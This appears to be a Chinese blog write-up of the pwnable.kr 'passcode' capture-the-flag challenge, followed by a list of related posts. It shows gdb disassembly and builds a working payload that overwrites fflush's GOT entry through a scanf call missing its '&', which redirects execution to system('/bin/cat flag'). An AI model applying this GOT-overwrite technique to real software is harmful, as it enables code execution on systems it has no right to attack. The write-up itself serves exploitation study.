pwnable kr 之 passcode
http://pwnable.kr/playproc.php?no=18
首先,需要对got表的一个基础认识
这里对got表和plt表进行一个简单的介绍
https://blog.csdn.net/qq_18661257/article/details/54694748
用gdb运行一下程序
gdb ./passcode#查看main函数的反汇编(gdb) disass mainDump of assembler code for function main:0x08048665 <+0>: push %ebp0x08048666 <+1>: mov %esp,%ebp0x08048668 <+3>: and $0xfffffff0,%esp0x0804866b <+6>: sub $0x10,%esp0x0804866e <+9>: movl $0x80487f0,(%esp)0x08048675 <+16>: call 0x8048450 <puts@plt>0x0804867a <+21>: call 0x8048609 <welcome> //welcome,login函数没有输入参数0x0804867f <+26>: call 0x8048564 <login> //两个函数的ebp位置没有变化0x08048684 <+31>: movl $0x8048818,(%esp)0x0804868b <+38>: call 0x8048450 <puts@plt>0x08048690 <+43>: mov $0x0,%eax0x08048695 <+48>: leave 0x08048696 <+49>: ret
End of assembler dump.#查看 welcome ,login 函数(gdb) disass welcome
Dump of assembler code for function welcome:0x08048609 <+0>: push %ebp0x0804860a <+1>: mov %esp,%ebp0x0804860c <+3>: sub $0x88,%esp0x08048612 <+9>: mov %gs:0x14,%eax0x08048618 <+15>: mov %eax,-0xc(%ebp)0x0804861b <+18>: xor %eax,%eax0x0804861d <+20>: mov $0x80487cb,%eax0x08048622 <+25>: mov %eax,(%esp)0x08048625 <+28>: call 0x8048420 <printf@plt> 0x0804862a <+33>: mov $0x80487dd,%eax0x0804862f <+38>: lea -0x70(%ebp),%edx0x08048632 <+41>: mov %edx,0x4(%esp)0x08048636 <+45>: mov %eax,(%esp)0x08048639 <+48>: call 0x80484a0 <__isoc99_scanf@plt> //输入用户名0x0804863e <+53>: mov $0x80487e3,%eax0x08048643 <+58>: lea -0x70(%ebp),%edx0x08048646 <+61>: mov %edx,0x4(%esp)0x0804864a <+65>: mov %eax,(%esp)0x0804864d <+68>: call 0x8048420 <printf@plt> //打印用户名0x08048652 <+73>: mov -0xc(%ebp),%eax0x08048655 <+76>: xor %gs:0x14,%eax0x0804865c <+83>: je 0x8048663 <welcome+90>
---Type <return> to continue, or q <return> to quit---r0x0804865e <+85>: call 0x8048440 <__stack_chk_fail@plt>0x08048663 <+90>: leave 0x08048664 <+91>: ret
End of assembler dump.(gdb) disass login
Dump of assembler code for function login:0x08048564 <+0>: push %ebp0x08048565 <+1>: mov %esp,%ebp0x08048567 <+3>: sub $0x28,%esp0x0804856a <+6>: mov $0x8048770,%eax0x0804856f <+11>: mov %eax,(%esp)0x08048572 <+14>: call 0x8048420 <printf@plt>0x08048577 <+19>: mov $0x8048783,%eax0x0804857c <+24>: mov -0x10(%ebp),%edx //正常scanf的第二个参数是lea xxx,xxx0x0804857f <+27>: mov %edx,0x4(%esp) //说明第二个参数少了&,为got表覆写提供了条件0x08048583 <+31>: mov %eax,(%esp)0x08048586 <+34>: call 0x80484a0 <__isoc99_scanf@plt> //输入passcode10x0804858b <+39>: mov 0x804a02c,%eax0x08048590 <+44>: mov %eax,(%esp)0x08048593 <+47>: call 0x8048430 <fflush@plt>0x08048598 <+52>: mov $0x8048786,%eax0x0804859d <+57>: mov %eax,(%esp)0x080485a0 <+60>: call 0x8048420 <printf@plt>0x080485a5 <+65>: mov $0x8048783,%eax0x080485aa <+70>: mov -0xc(%ebp),%edx0x080485ad <+73>: mov %edx,0x4(%esp)0x080485b1 <+77>: mov %eax,(%esp)0x080485b4 <+80>: call 0x80484a0 <__isoc99_scanf@plt> //输入passcode20x080485b9 <+85>: movl $0x8048799,(%esp)0x080485c0 <+92>: call 0x8048450 <puts@plt>0x080485c5 <+97>: cmpl $0x528e6,-0x10(%ebp)0x080485cc <+104>: jne 0x80485f1 <login+141>
---Type <return> to continue, or q <return> to quit---r0x080485ce <+106>: cmpl $0xcc07c9,-0xc(%ebp)0x080485d5 <+113>: jne 0x80485f1 <login+141>0x080485d7 <+115>: movl $0x80487a5,(%esp)0x080485de <+122>: call 0x8048450 <puts@plt>0x080485e3 <+127>: movl $0x80487af,(%esp) //flag所在之处,记住这个指令地址0x080485e30x080485ea <+134>: call 0x8048460 <system@plt>0x080485ef <+139>: leave 0x080485f0 <+140>: ret 0x080485f1 <+141>: movl $0x80487bd,(%esp)0x080485f8 <+148>: call 0x8048450 <puts@plt>0x080485fd <+153>: movl $0x0,(%esp)0x08048604 <+160>: call 0x8048480 <exit@plt>
End of assembler dump.
我们选择覆写scanf passcode1 后面的第一个函数 fflush的got表
(gdb) x/16i 0x80484300x8048430 <fflush@plt>: jmp *0x804a004 //0x804a004是fflush函数的got表位置0x8048436 <fflush@plt+6>: push $0x80x804843b <fflush@plt+11>: jmp 0x80484100x8048440 <__stack_chk_fail@plt>: jmp *0x804a0080x8048446 <__stack_chk_fail@plt+6>: push $0x100x804844b <__stack_chk_fail@plt+11>: jmp 0x80484100x8048450 <puts@plt>: jmp *0x804a00c0x8048456 <puts@plt+6>: push $0x180x804845b <puts@plt+11>: jmp 0x80484100x8048460 <system@plt>: jmp *0x804a0100x8048466 <system@plt+6>: push $0x200x804846b <system@plt+11>: jmp 0x80484100x8048470 <__gmon_start__@plt>: jmp *0x804a0140x8048476 <__gmon_start__@plt+6>: push $0x280x804847b <__gmon_start__@plt+11>: jmp 0x80484100x8048480 <exit@plt>: jmp *0x804a018
(gdb) x/16s 0x8048783
0x8048783: "%d" //是输入int值
0x8048786: "enter passcode2 : "
0x8048799: "checking..."
0x80487a5: "Login OK!"
0x80487af: "/bin/cat flag"
0x80487bd: "Login Failed!"
0x80487cb: "enter you name : "
0x80487dd: "%100s"
0x80487e3: "Welcome %s!\n"
0x80487f0: "Toddler's Secure Login System 1.0 beta."
0x8048818: "Now I can safely trust you that you have credential :)"
0x804884f: ""
0x8048850: "\001\033\003;@"
0x8048856: ""
0x8048857: ""
0x8048858: "\a"
这里我们就大致能够构造处我们的payload
'A'*0x(70-10) + '\x04\xa0\x04\x08' + '134514147\n' // 134514147是由0x080485e3转换为int类型的值
填充96个A,然后将fflush的got表的地址将passcode1的值覆盖,scanf (”%d“,passcode1) 将sys函数开始地址0x080485e3
覆盖fflush的got表,当程序执行到fflush函数时,就会跳转到0x080485e3处也就是sys函数处。
pwnable kr 之 passcode相关推荐
- 【pwnable.kr】passcode
pwnable从入门到放弃,第六题. ssh passcode@pwnable.kr -p2222 (pw:guest) 完全是'&'的锅. #include <stdio.h> ...
- pwnable.kr wp passcode
题目 Mommy told me to make a passcode based login system. My initial C code was compiled without any e ...
- pwnable.kr之passcode
passcode 下载下来的源代码 从源代码分析看出来,在scanf的时候passcode1和passcode2没有加地址符号,因此会存在题目中所说的警告. 这道题木一共两个函数,welcome和Lo ...
- 【pwnable.kr】 passcode
https://r00tnb.github.io/2017/12/10/pwnable.kr-passcode/ 分析 首先读源码passcode.c 1 2 3 4 5 6 7 8 9 10 11 ...
- pwnable.kr第五题:passcode
0x000打开环境 ①查看源码: 1 #include 2 #include 3 4 void login(){ 5 int passcode1; 6 int passcode2; 7 8 print ...
- PWN passcode [pwnable.kr]CTF writeup题解系列5
直接看题目: 连接服务器看看情况: root@mypwn:/ctf/work/pwnable.kr# ssh passcode@pwnable.kr -p2222 passcode@pwnable.k ...
- 【pwnable.kr】Toddler‘s Bottle-[passcode]
目录导航 进入服务器 下载文件 反编译分析 EXP TIPS 进入服务器 Mommy told me to make a passcode based login system. My initial ...
- pwnable.kr passcode
题目来自pwnable.kr 里面的思路是通过学习别人的文章获得的,作为个人的学习记录一下 题目是这样的 passcode SSH连接一下 看看有什么文件 可以看到有三个文件,其中 flag 只对创建 ...
- pwnable.kr - passcode
这个题考查的是GOT表覆写 先来说说做题的思路和方法,看到源代码 void login(){int passcode1;int passcode2;printf("enter passcod ...
最新文章
- 远程服务器的环境的配置
- C++中#ifndef/#define/#endif使用详解
- php pdo mysql哪个好_php pdo和mysqli对比选择
- 前端学习(1031):jquery多库共存
- php把视频剪辑成15秒一段,如何快速分割视频 一个视频或一个电影截取变成几份的功能 一段段截取 太累了...
- 我的Android进阶之旅------Android图片处理(Matrix,ColorMatrix)
- 动图:七分钟帮你理解什么是KMP算法?
- GBDT算法详解算法实例(分类算法)
- 基于SSH的宠物管理系统
- python调用r语言函数_让R与Python共舞
- wordcloud库应用-《唐诗三百首》词云图详解
- 想到我爱你的绝对不正常
- 史上最全面的苏州工业园区虚拟住房补贴申请攻略
- Laravel 存在SQL注入漏洞
- 视觉语言导航综述Visual Language Navigation
- centos7 安装anaconda3,notebook,解决matplotlib 中文乱码
- NYOJ:458-小光棍数
- python三个点是什么意思_Python 3 中 ... 三个点的省略号的作用
- 中国境外三个不为人知的汉人政权
- 各种泵的图形符号_定量泵的图形符号